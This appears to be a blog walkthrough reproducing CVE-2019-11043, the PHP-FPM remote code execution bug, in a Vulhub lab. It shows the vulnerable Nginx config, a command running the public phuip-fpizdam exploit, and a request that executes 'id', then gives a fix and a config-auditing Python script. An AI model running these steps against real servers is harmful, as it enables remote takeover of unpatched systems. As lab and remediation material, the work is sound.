CVE vulnerability reproduction: CVE-2019-11043 PHP-FPM remote code execution vulnerability

CVE-2019-11043 - PHP-FPM Remote Code Execution Vulnerability

Vulnerability description

Andrew Danau, a security researcher at Wallarm, accidentally sent %0a (a line break) to a server during the Real World CTF held on September 14-16; the server returned an abnormal response, and that is how this 0-day vulnerability was found.

A remote code execution vulnerability exists when Nginx uses a specific fastcgi configuration, but this configuration is not the Nginx default. Only when fastcgi_split_path_info is configured as ^(.+?\.php)(/.*)$; can an attacker achieve remote code execution through a carefully constructed payload. Because this configuration is widely used, the impact is considerable.

The version affected by the vulnerability

When an Nginx + php-fpm server carries the following configuration, remote code execution becomes possible:

location ~ [^/]\.php(/|$) {
  ...
  fastcgi_split_path_info ^(.+?\.php)(/.*)$;
  fastcgi_param PATH_INFO       $fastcgi_path_info;
  fastcgi_pass   php:9000;
  ...
}

Vulnerability reproduction

This reproduction uses the Vulhub lab environment, which first has to be set up locally.

Enter the lab environment directory and start the environment with the following command:

docker-compose up -d


Check whether the environment's port is open:

docker-compose ps


Access the target URL: http://192.168.0.109:8080/


Download the exploit poc: https://github.com/neex/phuip-fpizdam

Go into the downloaded directory and execute the following command (a Go toolchain is required):

go run . "http://192.168.0.109:8080/index.php"


Visit http://192.168.0.109:8080/index.php?a=id

Note: /index.php?a=php may need to be visited several times before a request is served by the poisoned worker process.

Fix

Delete the following configuration from the Nginx configuration file:

fastcgi_split_path_info ^(.+?\.php)(/.*)$;
fastcgi_param PATH_INFO       $fastcgi_path_info;
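As an added check that is not part of the original write-up, the following Python script scans Nginx configuration text for location blocks that combine the fastcgi_split_path_info regex above with PATH_INFO forwarded from $fastcgi_path_info. It assumes a `try_files $uri =404;` guard (which rejects requests for scripts that do not exist before they reach PHP-FPM) counts as a mitigation; the two sample configurations are constructed for the demonstration.

```python
import re

# Directives that together form the vulnerable combination described above,
# compared after collapsing whitespace so indentation differences do not matter.
VULN_SPLIT = r'fastcgi_split_path_info ^(.+?\.php)(/.*)$;'
VULN_PATH_INFO = 'fastcgi_param PATH_INFO $fastcgi_path_info;'
# Assumed mitigation (not the page's own fix): reject requests whose script
# is absent on disk before they are forwarded to PHP-FPM.
GUARD = 'try_files $uri =404;'

LOCATION_RE = re.compile(r'location\s+(.+?)\s*\{')

def location_blocks(config):
    """Return (location_spec, body) pairs by matching braces from each 'location ... {'."""
    blocks = []
    for m in LOCATION_RE.finditer(config):
        depth, i = 0, m.end() - 1          # start on the opening brace
        while i < len(config):
            if config[i] == '{':
                depth += 1
            elif config[i] == '}':
                depth -= 1
                if depth == 0:
                    break
            i += 1
        blocks.append((m.group(1), config[m.end():i]))
    return blocks

def audit(config):
    """Return specs of location blocks that split PATH_INFO with the vulnerable
    regex, forward it to PHP-FPM, and carry no try_files guard."""
    findings = []
    for spec, body in location_blocks(config):
        lines = {' '.join(line.split()) for line in body.splitlines()}
        if VULN_SPLIT in lines and VULN_PATH_INFO in lines and GUARD not in lines:
            findings.append(spec)
    return findings

# Constructed samples: the weak block from the write-up and a hardened variant.
WEAK_CONF = r"""
location ~ [^/]\.php(/|$) {
  fastcgi_split_path_info ^(.+?\.php)(/.*)$;
  fastcgi_param PATH_INFO $fastcgi_path_info;
  fastcgi_pass php:9000;
}
"""
HARDENED_CONF = WEAK_CONF.replace('{\n', '{\n  try_files $uri =404;\n', 1)

if __name__ == '__main__':
    print('weak config flagged:', audit(WEAK_CONF))          # ['~ [^/]\\.php(/|$)']
    print('hardened config flagged:', audit(HARDENED_CONF))  # []
```

Run it against a real nginx.conf by passing the file contents to audit(); an empty result means no block carries the unguarded combination.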


Source: blog.csdn.net/qq_64973687/article/details/130416949